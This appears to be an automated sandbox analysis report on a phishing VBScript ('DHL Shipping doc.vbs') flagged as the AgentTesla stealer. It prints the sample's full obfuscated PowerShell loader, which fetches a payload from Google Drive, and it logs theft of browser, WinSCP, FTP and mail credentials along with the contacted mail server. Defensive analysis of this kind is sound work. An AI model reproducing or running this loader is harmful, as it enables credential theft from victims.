(selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavegaJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts121
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		24
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)1
            Software Packing            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS111
            Security Software Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets1
            Process Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials141
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430756 Sample: DHL Shipping doc.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 29 mail.cash4cars.nz 2->29 31 drive.usercontent.google.com 2->31 33 2 other IPs or domains 2->33 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 63 VBScript performs obfuscated calls to suspicious functions 9->63 65 Suspicious powershell command line found 9->65 67 Wscript starts Powershell (via cmd or directly) 9->67 69 3 other signatures 9->69 12 powershell.exe 14 19 9->12         started        process6 dnsIp7 39 drive.usercontent.google.com 142.251.2.132, 443, 49731, 49739 GOOGLEUS United States 12->39 41 drive.google.com 142.251.2.139, 443, 49730, 49738 GOOGLEUS United States 12->41 71 Suspicious powershell command line found 12->71 73 Very long command line found 12->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 12->75 16 powershell.exe 17 12->16         started        19 conhost.exe 12->19         started        21 cmd.exe 1 12->21         started        signatures8 process9 signatures10 43 Writes to foreign memory regions 16->43 45 Found suspicious powershell code related to unpacking or dynamic code loading 16->45 23 wab.exe 15 8 16->23         started        27 cmd.exe 1 16->27         started        process11 dnsIp12 35 mail.cash4cars.nz 114.142.162.17, 26, 49741 SERVERMULE-AS-APNimbus2PtyLtdAU Australia 23->35 37 api.ipify.org 104.26.13.205, 443, 49740 CLOUDFLARENETUS United States 23->37 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->55 57 Tries to steal Mail credentials (via file / registry access) 23->57 59 Tries to harvest and steal ftp login credentials 23->59 61 Tries to harvest and steal browser information (history, passwords, etc) 23->61 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL Shipping doc.vbs8%ReversingLabsScript-WScript.Trojan.Heuristic
            DHL Shipping doc.vbs15%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            mail.cash4cars.nz2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://crl.micro0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://r3.o.lencr.org00%URL Reputationsafe
            https://drive.googP0%Avira URL Cloudsafe
            https://drive.usercontent.googh0%Avira URL Cloudsafe
            http://crl.mUy0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0R0%Avira URL Cloudsafe
            http://mail.cash4cars.nz0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0R0%VirustotalBrowse
            http://mail.cash4cars.nz2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.cash4cars.nz
            		114.142.162.17
            		truetrueunknown
            drive.google.com
            		142.251.2.139
            		truefalse
              		high
              drive.usercontent.google.com
              		142.251.2.132
              		truefalse
                		high
                api.ipify.org
                		104.26.13.205
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://r3.i.lencr.org/0Rwab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mail.cash4cars.nzwab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://drive.usercontent.google.compowershell.exe, 00000001.00000002.2198052956.000001D959B52000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        • URL Reputation: malware
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000001.00000002.2198052956.000001D95A17A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://drive.googPpowershell.exe, 00000001.00000002.2198052956.000001D95B800000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.usercontent.googhpowershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.usercontent.google.com/wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/pscore6lBkqpowershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://drive.google.compowershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.ipify.org/twab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
